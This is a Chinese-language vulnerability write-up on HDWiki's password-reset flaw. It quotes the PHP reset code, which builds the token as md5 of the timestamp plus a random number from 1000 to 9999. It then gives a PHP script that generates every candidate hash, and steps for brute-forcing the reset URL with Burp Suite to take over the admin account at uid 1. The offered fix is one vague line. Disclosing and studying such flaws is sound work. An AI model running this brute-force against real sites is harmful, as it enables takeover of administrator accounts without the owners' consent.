Hdwiki 设计缺陷 知邮箱可改密码下载

在control/user.php中



 

function dogetpass(){

		if(isset($this->get[2])){

			$uid = is_numeric($this->get[2]) ? $this->get[2] : 0;

			$encryptstring=$this->get[3];

			$idstring=$_ENV['user']->get_idstring_by_uid($uid,$this->time);

			if(!empty($encryptstring) && !empty($idstring) && ($idstring==$encryptstring)){

省略一点。

 

}else{

			$timetemp=date("Y-m-d H:i:s",$this->time);

			$verification= rand(1000,9999);

			

			$encryptstring=md5($this->time.$verification);

		

			$reseturl=WIKI_URL."/index.php?user-getpass-".$user['uid'].'-'.$encryptstring;

			$_ENV['user']->update_getpass($user['uid'],$encryptstring);

			$mail_subject = $this->setting['site_name'].$this->view->lang['getPass'];

			$mail_message = $this->view->lang['resetPassMs1'].$user['username'].$this->view->lang['resetPassMs2'].$timetemp.$this->view->lang['resetPassMs3']."<a href='".$reseturl."' target='_blank'>".$reseturl."</a>".$this->view->lang['resetPassMs4'].$this->setting['site_name'].$this->view->lang['resetPassMs5'].$this->setting['site_name'].$this->view->lang['resetPassMs6'];

			$this->load('mail');

			$_ENV['mail']->add(array(), array($email), $mail_subject, $mail_message, '', 1, 0);

			$this->message($this->view->lang['emailSucess'],'index.php?user-login',0);

看这里 需要改密码的话就是验证encryptstring 而encryptstring的验证很弱。。



$encryptstring=md5($this->time.$verification);



这里 就是对时间戳 和 一个随机的1000-10000 进行md5一次。



这里我们可以来直接进行爆破。





由于 管理员 和 用户都是在一个表里面的。



所以 也可以改管理的密码。 在点击找回密码的时候 记住一下时间戳

 

然后 写个脚本。 因为我之前测试的时候时间戳不是这样的 我用的之前测试的时候的时间戳截图。



 

<?php



for ($a=1000;$a<10001;$a++){

$b=md5("1396789952$a");

echo "\r\n";

echo $b;}

?>

然后导出来, 然后载入burpsuite进行爆破。



index.php?user-getpass-".$user['uid'].'-'.$encryptstring



路径是为这样的 一般我们就是用来修改管理员的密码、 而管理的uid都是1 这个就不用管了。

观察length 即可知道 正确不。



可以看到我这个爆破到3768的时候 成功。

然后直接访问。

 

即可直接修改管理的密码。

 

修复方案：

加强验证。